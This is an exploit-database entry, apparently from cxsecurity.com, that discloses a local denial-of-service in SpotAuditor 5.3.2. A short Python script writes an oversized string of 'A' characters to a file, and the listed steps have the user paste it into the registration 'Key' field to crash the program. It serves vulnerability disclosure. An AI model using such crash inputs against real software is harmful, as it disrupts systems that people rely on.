SpotAuditor 5.3.2 Key Denial of Service

2019.12.10
Credit: ZwX
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service #Exploit Author : ZwX #Exploit Date: 2019-11-28 #Vendor Homepage : http://www.nsauditor.com/ #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a ''' Proof of Concept (PoC): ======================= 1.Download and install SpotAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.SpotAuditor Crashed ''' #!/usr/bin/python http = "http//" buffer = "\x41" * 2000 poc = http + buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top